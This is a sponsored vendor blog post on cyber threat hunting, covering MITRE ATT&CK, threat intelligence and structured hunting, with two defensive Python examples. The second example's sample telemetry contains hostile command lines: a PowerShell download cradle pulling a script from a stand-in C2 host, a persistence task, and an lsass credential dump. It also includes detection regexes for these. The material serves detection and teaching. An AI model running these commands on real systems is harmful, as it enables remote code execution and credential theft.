Editor’s Note: This is a partnered sponsored guest blog written by Avertium.
Cyber threat hunting is a proactive cybersecurity practice that searches through networks and endpoints to detect and isolate advanced threats before they surface as alerts. Threat hunters do not simply search for active threats. They look for adversary tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), indicators of attack (IOAs), and threats such as advanced persistent threats (APTs) that are evading your existing security controls. Although threat hunters have a variety of strategies at their disposal, the best strategy is usually determined by the type of threat being hunted.
At its core, threat hunting is more than detection and response. Threat detection focuses on identifying evidence of an attack that already matches something known, such as a correlated event or a signature. Threat hunting takes the more proactive approach: it is intended to counter an adversary that is already in the organization’s environment but has not yet produced any indicator of compromise that existing controls would flag.
Threat hunting instead uses a threat indicator as the starting point, or hypothesis, for a search. Virtual fingerprints left by malware or an attacker, an unfamiliar IP address, phishing emails, or other unexpected network traffic are all such indicators. In other words, threat hunting does not wait for IOCs to be flagged before seeking out a breach.
Both threat detection and threat hunting are complementary approaches to identifying and responding to security threats. They are most effective when used in tandem. While threat detection provides vital defensive measures, threat hunting is the offensive playbook for outmaneuvering an enemy before they have the chance to act.
In a non-security setting, consider a bank. An effective criminal does research before staging a robbery: investigating the security systems, walking the premises, and noting the layout of the building and the location of the vault before returning to perform the heist. A bank that relies solely on threat detection is alerted only once IOCs are flagged, by which point the criminal has already reached the vault. A bank that also threat hunts is continuously watching for IOAs, giving its security team the chance to respond to suspicious activity before the plan is executed. None of these IOAs individually signals an imminent threat, but viewed together in context they give reason to monitor the individual.
Effective threat hunters hypothesize the most likely tactics and attack chains by thinking like their adversaries. That said, there is no one-size-fits-all tactical approach to threat hunting. Instead, effective threat hunters rely on an arsenal of tools, frameworks, and methodologies for hunting threats.
How do you stop a threat when you are not sure it even exists? You hunt for it. To be a successful threat hunter, you need to stay one step ahead of your adversaries: understand their perspective, form a hypothesis about the existence of a threat, work out how to detect it, and then stop it. The MITRE ATT&CK framework is a good starting point for understanding attackers; it provides a catalog of real-world adversary tactics and techniques.
Using the MITRE ATT&CK framework to inform your SIEM configuration can also streamline threat hunting.
The complexity and volume of cyber threats are evolving at a dangerously rapid pace. With the shortage of qualified analysts, inefficient manual processes, and the growing cost of securing a business, organizations of all sizes are exposed to countless risks.
Avertium’s Cyber Fusion Centers (CFCs) leverage artificial intelligence (AI) and machine learning (ML), and LogRhythm’s SOC analysts use ML, to stay ahead. The solution is to incorporate security technology that uses AI to automate the tasks associated with threat detection, incident response, and administration.
LogRhythm UEBA provides unparalleled accuracy by using ML to detect hidden threats and adapts as your environment changes. It combines supervised and unsupervised learning for continuous, automated tuning without manual intervention, so your security grows smarter over time.
Cyber threat intelligence (CTI) is a body of information about attempted or successful breaches, gathered and evaluated by analysts and by automated security systems, including those that use machine learning and artificial intelligence. Used to your advantage, threat intelligence helps you hunt down your threats, shifting your security from reaction to prevention.
Threat hunting begins where threat intelligence leaves off. CTI plays an essential role in keeping your security operations staff up to date on active threat actors and the latest TTPs likely to be used against your company, and those TTPs become the hunter’s hypotheses.
Ariel Ropek, Avertium’s Director of Cyber Threat Intelligence, gives a concrete example of what the value of threat intelligence looks like in practice:
“The Conti and Ryuk ransomware kill chains both begin with TrickBot malware as the initial infection. Conti progresses to the PowerShell Empire toolset for persistence and command and control (C2), while Ryuk typically uses Cobalt Strike for C2 operations. If a threat hunter observed IOCs related to TrickBot malware in an environment, they could use this intelligence to expand their hunt to both PS Empire and Cobalt Strike IOCs. The result of those searches would indicate whether Conti or Ryuk was the likely adversary and inform incident response teams of appropriate next steps.”
Intelligence-driven threat hunting links malicious activity to known entities and gives threat hunters additional context about how far the kill chain has progressed as well as what the adversary is likely to do next.
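The pivot Ropek describes, as an added example that is not Avertium’s or LogRhythm’s code: the tool names and the two kill-chain orderings (TrickBot then PowerShell Empire for Conti, TrickBot then Cobalt Strike for Ryuk) are taken from the quote; the indicator strings, the telemetry lines, and the attribution scoring are constructed placeholders for illustration, not real IOCs.

```python
# Intelligence-driven hunt expansion: pivot from an initial-access IOC to
# next-stage tooling using known kill chains, then score the likely adversary.
# Tool names and chain order come from the intel quote above; every indicator
# and telemetry line is a constructed placeholder, not a real IOC.

# Constructed placeholder indicators per toolset (NOT real IOCs).
TOOL_IOCS = {
    "TrickBot": {"tb-loader.exe", "cdn-update.example"},
    "PowerShell Empire": {"empire-stager.ps1", "empire-c2.example"},
    "Cobalt Strike": {"beacon.dll", "cs-c2.example"},
}

# Kill-chain ordering per adversary, as described in the quote.
KILL_CHAINS = {
    "Conti": ["TrickBot", "PowerShell Empire"],
    "Ryuk": ["TrickBot", "Cobalt Strike"],
}

# Constructed sample telemetry: "<timestamp> <host> <event_type> <detail>".
TELEMETRY = [
    r"2024-01-10T09:02:11 WS-17 proc_create C:\Users\a\AppData\Roaming\tb-loader.exe",
    r"2024-01-10T09:02:40 WS-17 dns_query cdn-update.example",
    r"2024-01-10T09:15:03 WS-17 image_load C:\Windows\Temp\beacon.dll",
    r"2024-01-10T09:16:22 WS-17 dns_query cs-c2.example",
    r"2024-01-10T09:30:00 WS-22 proc_create C:\Windows\System32\notepad.exe",
]


def find_iocs(telemetry, iocs):
    """Return the subset of `iocs` that appears in at least one telemetry line."""
    return {ioc for ioc in iocs if any(ioc in line for line in telemetry)}


def tools_seen(found_iocs):
    """Map matched indicators back to the toolsets they belong to."""
    return {tool for tool, iocs in TOOL_IOCS.items() if iocs & found_iocs}


def next_stage_tools(seen):
    """Toolsets that follow an already-seen tool in any known kill chain."""
    nxt = set()
    for chain in KILL_CHAINS.values():
        for i in range(len(chain) - 1):
            if chain[i] in seen:
                nxt.add(chain[i + 1])
    return nxt


def attribute(seen):
    """Score each adversary by how many consecutive kill-chain stages, from the start, are confirmed."""
    scores = {}
    for adversary, chain in KILL_CHAINS.items():
        stage = 0
        for tool in chain:
            if tool not in seen:
                break
            stage += 1
        scores[adversary] = stage
    return scores


def intelligence_driven_hunt(telemetry, seed_iocs):
    """Pivot from seed IOCs through the kill chain, widening scope until nothing new turns up."""
    found = find_iocs(telemetry, set(seed_iocs))
    seen = tools_seen(found)
    while True:
        # Expand the hunt to every toolset the intel says comes next.
        scope = set().union(*(TOOL_IOCS[t] for t in next_stage_tools(seen)))
        new_found = find_iocs(telemetry, scope) - found
        if not new_found:
            break
        found |= new_found
        seen = tools_seen(found)
    scores = attribute(seen)
    best = max(scores.values())
    likely = sorted(a for a, s in scores.items() if s == best and s > 0)
    return {"found_iocs": found, "tools_seen": seen, "scores": scores, "likely": likely}


if __name__ == "__main__":
    result = intelligence_driven_hunt(TELEMETRY, TOOL_IOCS["TrickBot"])
    for key, value in result.items():
        print(f"{key}: {value}")
```

Seeding the hunt with the TrickBot indicators finds the loader and its domain, expands to both PowerShell Empire and Cobalt Strike indicators, and turns up the beacon on the same host. Attribution then favors Ryuk over Conti, which is exactly the pivot the quote describes; a real implementation would replace the substring match with queries against the SIEM and feed the next expected stage back to the responders.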
Managed detection and response (MDR) is an outsourced managed security service that provides organizations with threat hunting services and responds to threats once they are discovered. It is yet another tool in the toolbox but is not all-inclusive.
Endpoint detection and response (EDR) continuously collects telemetry from endpoints (process execution, file, registry, and network activity) and analyzes it for suspicious behavior. It alerts security teams to anomalous activity and gives them the tooling to investigate and contain threats on the endpoint.
Threat hunting methodologies fall into two types: structured and unstructured hunting.
Structured threat hunting is based on indicators of attack and the TTPs of an attacker. It leverages the MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework, using both the PRE-ATT&CK and Enterprise matrices. Note that PRE-ATT&CK has since been retired as a separate matrix; its content now lives in Enterprise ATT&CK as the Reconnaissance and Resource Development tactics.
Unstructured hunting is trigger-based: starting from a detected IOC, it follows the trail through whatever data is available, both before and after the detection.
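A structured hunt, as an added example that is neither LogRhythm’s nor Avertium’s code and not how ATT&CK itself prescribes detection: each hypothesis is an ATT&CK technique ID (the IDs are real Enterprise ATT&CK identifiers) paired with a concrete, testable claim about what the technique would look like in process-creation telemetry. The events, hosts, users, and detection regexes are constructed for illustration; the encoded PowerShell payload is generated at load time so the example is self-consistent. This serves both the earlier point about letting ATT&CK inform SIEM content and the definition of structured hunting above.

```python
import base64
import re
from collections import defaultdict

# Constructed process-creation events (not real telemetry). The encoded
# PowerShell payload is generated here so the example is self-consistent.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

EVENTS = [
    {"ts": "2024-01-10T09:02:11", "host": "WS-17", "user": "alice",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"ts": "2024-01-10T09:03:05", "host": "WS-17", "user": "alice",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn Updater /tr "C:\Users\alice\AppData\Roaming\up.exe" /sc minute /mo 5'},
    {"ts": "2024-01-10T09:40:00", "host": "SRV-02", "user": "svc_backup",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Temp\lsass.dmp full"},
    {"ts": "2024-01-10T10:00:00", "host": "WS-22", "user": "bob",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Reports"},
    {"ts": "2024-01-10T10:05:00", "host": "WS-22", "user": "bob",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": "schtasks.exe /query /tn Updater"},
]


def _is_powershell(ev):
    return ev["image"].lower().endswith(("powershell.exe", "pwsh.exe"))


# Hypotheses: ATT&CK technique ID -> (description, predicate). The technique IDs
# are real ATT&CK identifiers; the predicates are this example's own simplified
# detection logic, not the framework's or any vendor's rules.
HYPOTHESES = {
    "T1059.001": (
        "PowerShell launched with an encoded command or a download cradle",
        lambda ev: _is_powershell(ev) and re.search(
            r"(?i)(-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}|downloadstring|frombase64string)",
            ev["cmdline"]) is not None,
    ),
    "T1053.005": (
        "Scheduled task created that runs a binary from a user-writable path",
        lambda ev: ev["image"].lower().endswith("schtasks.exe")
        and "/create" in ev["cmdline"].lower()
        and re.search(r"(?i)\\(users|temp|appdata)\\", ev["cmdline"]) is not None,
    ),
    "T1003.001": (
        "Process memory dump via comsvcs MiniDump, or procdump aimed at lsass",
        lambda ev: re.search(r"(?i)comsvcs\.dll,\s*minidump|procdump.*lsass", ev["cmdline"]) is not None,
    ),
}


def decode_encoded_command(cmdline):
    """Recover the plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE)."""
    m = re.search(r"(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def structured_hunt(events, hypotheses=HYPOTHESES):
    """Test every hypothesis against every event; return the matches with their technique IDs."""
    matches = []
    for ev in events:
        for tid, (description, predicate) in hypotheses.items():
            if predicate(ev):
                matches.append({
                    "technique": tid, "description": description,
                    "ts": ev["ts"], "host": ev["host"], "user": ev["user"],
                    # Decode the payload when present so the analyst sees what actually ran.
                    "decoded": decode_encoded_command(ev["cmdline"]) if tid == "T1059.001" else None,
                })
    return matches


def techniques_by_host(matches):
    """Distinct technique IDs per host; several TTPs on one host is a stronger lead than one alert."""
    by_host = defaultdict(set)
    for m in matches:
        by_host[m["host"]].add(m["technique"])
    return {host: sorted(tids) for host, tids in by_host.items()}


if __name__ == "__main__":
    hits = structured_hunt(EVENTS)
    for h in hits:
        print(h["ts"], h["host"], h["technique"], h["description"], h["decoded"] or "")
    print(techniques_by_host(hits))
```

Run against the constructed events, the hunt flags two techniques on WS-17 (encoded PowerShell download cradle followed by a persistence task in the user’s profile) and one on SRV-02, while bob’s benign PowerShell and the read-only schtasks query on WS-22 produce nothing. Grouping by host is the point: a single matched hypothesis is a lead, two consecutive ATT&CK stages on the same host is an investigation.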
The tactics, techniques, and procedures of bad actors are always evolving. Adaptive enemies call for adaptive security. A holistic, risk-based approach to cybersecurity layers services, technology capabilities, and tried-and-true security frameworks like MITRE ATT&CK with strategy and client collaboration to deliver a more resilient security posture. See the resources for additional help with your threat hunting planning.